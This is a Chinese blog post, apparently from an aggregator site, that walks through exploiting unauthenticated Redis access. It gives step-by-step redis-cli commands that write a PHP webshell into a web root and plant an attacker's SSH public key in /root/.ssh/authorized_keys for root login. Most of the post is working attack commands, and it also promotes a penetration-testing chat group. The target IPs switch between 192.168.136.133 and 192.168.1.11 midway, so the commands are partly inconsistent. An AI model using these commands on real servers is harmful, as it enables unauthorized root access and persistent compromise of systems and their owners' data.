您的位置:首页 > 数据库 > Redis

Redis未授权访问漏洞的利用

2020-02-03 08:43 369 查看

渗透学习交流群:773617250,群内定期直播,发布相关教程,欢迎咨询群主学习交流!

 利用redis写webshell
 在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”

save


 然后看一下目录下是否生成了一个redis.php的文件

 可以看到生成了,查看一下文件的内容

 在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell

 Redis 未授权访问配合 SSH key 文件利用
 首先在攻击机生成密匙:ssh-keygen –t rsa


 看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容

 然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt

 然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save

 然后去目标机看一下是否生成

 然后回到攻击机,利用自己的密钥进行ssh登录:
ssh –i id_rsa root@192.168.136.133

  • 点赞
  • 收藏
  • 分享
  • 文章举报
L18296069161 发布了23 篇原创文章 · 获赞 0 · 访问量 518 私信 关注
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: